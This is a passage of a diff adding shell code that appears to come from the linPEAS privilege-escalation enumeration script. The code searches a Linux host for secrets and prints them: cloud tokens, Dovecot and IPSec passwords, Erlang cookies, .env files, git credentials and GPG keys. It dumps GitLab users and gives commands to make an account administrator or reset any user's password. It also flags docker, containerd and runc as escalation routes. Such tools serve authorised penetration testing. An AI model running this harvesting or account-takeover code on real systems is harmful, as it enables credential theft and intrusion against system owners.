-IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; + + + #-- SI) Dovecot + # Needs testing + print_2title "Searching dovecot files" + dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) + if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" + else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done + fi + echo "" + + print_2title "Analyzing Mosquitto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Neo4j Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Cloud Credentials Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then echo_not_found "access_tokens.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then echo_not_found "access_tokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then echo_not_found "accessTokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then echo_not_found "azureProfile.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then echo_not_found "TokenCache.dat"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then echo_not_found "AzureRMContext.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Cloud Init Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing CloudFlare Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; + + + print_2title "Analyzing Erlang Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing GMV Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing IPSec Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing IRSSI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Keyring Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Backup Manager Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + + + ##-- SI) passwd files (splunk) + print_2title "Searching uncommon passwd files (splunk)" + SPLUNK_BIN="`command -v splunk 2>/dev/null`" + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi + printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," + fi + done + echo "" + + ##-- SI) Gitlab + print_2title "Searching GitLab related files" + #Check gitlab-rails + if [ "`command -v gitlab-rails`" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" + fi + if [ "`command -v gitlab-backup`" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" + fi + #Check gitlab files + printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if [ "`echo $f | grep secrets.yml`" ]; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif [ "`echo $f | grep gitlab.yml`" ]; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif [ "`echo $f | grep gitlab.rb`" ]; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" + done + echo "" + + print_2title "Analyzing Github Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Svn Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; + + + print_2title "Analyzing PGP-GPG Files (limit 70)" + ((command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null + ((command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null + (command -v netpgp || echo_not_found "netpgp") 2>/dev/null + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Cache Vi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; + + + ##-- SI) containerd installed + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" + containerd=`command -v ctr` + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list + fi + echo "" + + ##-- SI) runc installed + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" + runc=`command -v runc` + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + fi + echo "" + + #-- SI) Docker + print_2title "Searching docker files (limit 70)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" + printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi + done + echo "" + + print_2title "Analyzing Firefox Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Chrome Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Autologin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + + + #-- SI) S/Key athentication + print_2title "S/Key authentication" + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) YubiKey athentication + print_2title "YubiKey authentication" + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) Passwords inside pam.d + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + echo "" + + print_2title "Analyzing SNMP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Pypirc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Ldaprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Env Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Msmtprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Keepass Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + + + print_2title "Analyzing Bind Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BIND\" | 